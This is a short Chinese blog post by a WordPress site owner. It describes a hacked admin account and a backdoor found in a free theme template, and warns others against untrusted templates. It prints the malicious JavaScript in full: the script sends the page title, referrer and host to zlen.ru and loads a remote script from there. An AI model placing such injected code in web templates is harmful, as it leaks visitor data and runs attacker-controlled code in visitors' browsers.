前段时间,博客没有及时更新,可以这么说,这套博客系统是 自豪的采用了 wordpress 进行搭建。
使用这样的系统很常见的一个问题就是系统可能很多漏洞会被很多人知晓。
前段时间,博客后台就被攻破 了。。。这点博主用的密码太简单了,很容易就被猜解了。。。
于是博主重新登录到系统后台 重置了密码,并清除了一下乱起八糟的用户。。。
并对博客进行升级。。。
原本博主以为这样就结束了。。。
却没发现。。
原来博客的模版里早就埋下了一些后门。。。
PS:特别提醒个人建站的朋友,一定不要图免费,就使用网上随意可找到的一些模版之类的文件,小心有后门哦。
以下为示例:
var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://zlen.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}
博客升级以后 特别慢了。。。访问一个页面总是要6s + 才能打开。。
后来发现有个zlen.ru的域名请求,找了很久终于找到。。
这个伪装的挺深的。。
怀疑此处代码用于统计使用此模版的站点信息;
目前已经清除掉了。。播放打开速度 终于恢复。。。
微信扫一扫,打赏作者吧~转载请注明:苏demo的别样人生 » 【技巧】博客内莫名加载JS 的清除技巧
